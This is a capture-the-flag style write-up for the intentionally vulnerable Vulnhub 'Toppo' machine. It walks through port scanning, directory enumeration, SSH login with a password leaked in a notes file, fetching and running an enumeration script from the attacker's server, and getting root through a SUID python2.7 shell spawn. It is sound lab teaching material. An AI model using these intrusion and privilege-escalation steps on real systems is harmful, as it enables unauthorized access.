Vulnhub Toppo Writeup

Vulnhub Toppo Writeup
Toppo main page

Vulnhub writeup for Toppo machine will go through simple techniques like web enumeration using dirb tool and privilege escalation using script.

It is a simple box for beginner, Download and let’s go.

1. Scanning:

First of all, scan for open ports/services

# nmap -A -p-

vulnhub toppo nmap scan

Found open ports: SSH, HTTP, rpcbind 111


2. Web Enumeration:

Visit HTTP port:

Nothing interesting, lets enumerate for other paths:

# dirb -r

-r for non recursive enumeration.

vulnhun toppo enum web directories with dirb


Found some directories, admin directory sounds interesting.
It contain notes.txt file, open it, read the note.

Note to myself :

I need to change my password :/ 12345ted123 is too outdated but the technology isn’t my thing i prefer go fishing or watching soccer .

admin notes


It looks like a simple password for user ted [the only letters in simple password!!]

Try it with other services like SSH.


3. Gain Foothold shell:

# ssh [email protected]
Password: 12345ted123

Fine, we have shell as user ted on Toppo machine.

toppo user shell

Let’s see where we can go from there.


4. Privilege Escalation:

I am going to use script to automate privilege escalation enumeration.

Setup a simple web server on my PC:

# python -m SimpleHTTPServer 80

On target, download the file usng wget:

$ wget
$ chmod +x
$ ./

Wait till it is done.


Look in the result for interesting path to escalate our privileges
Found Python2.7 can be run as root !!


$ python2.7 -c “import pty;pty.spawn(‘/bin/sh’)”

# whoami

# cat /root/flag.txt

toppo root flag


Congratilations, We Got Toppo machine root flag.

Notice: we use /bin/sh and not /bin/bash as bash will not work because bash ignore SUID/SGID and always use the current user privilege.


Comments are closed.